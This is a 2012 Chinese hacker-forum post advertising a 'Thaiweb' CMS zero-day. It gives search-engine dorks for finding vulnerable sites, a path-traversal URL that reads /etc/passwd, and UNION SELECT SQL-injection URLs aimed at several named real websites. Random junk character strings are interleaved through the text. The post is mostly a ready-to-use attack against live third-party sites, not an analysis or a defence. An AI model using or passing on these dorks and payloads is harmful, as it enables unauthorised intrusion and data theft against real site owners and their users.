找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2046|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:( ~2 b) E: ~" H; S5 @
# h" U, m( T* \' s3 `# g- q
intext:powered by Thaiweb6 }: G) {& @7 p, l" k5 [

; x" ~7 A- q6 N! d2 G# finurl:index.php?page=board.php
6 \7 G2 f! B8 @6 e% e- g. N1 Y: D7 D0 r  N
% H# W% Z- r2 E; b, B) a  |+ B9 {

6 z0 J- l% _( k, p! p" R  o利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
4 X6 |, U$ _( y/ }+ h' @5 u" x3 y3 ~: X! H8 d) k1 n

8 P& E5 }1 d6 C' |6 a0 R/ H6 }! f/ Y8 R4 T1 M" ?
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'' u! s, C8 G3 o' W- b

& `+ K/ D! J9 g 5 R  f& v7 ^2 O$ C9 O6 W
! L$ d1 X* |$ S/ b) Z4 d: Y! z
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--3 G9 u2 Y  |* L6 y
  H, X- T8 x; z1 a/ `9 e; u
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 B. k" {+ s8 `/ @6 x! e  v- o
, I) Q- `. n8 |6 o9 M- a" C
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
9 b  }; }7 T: s5 K8 \/ {( t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表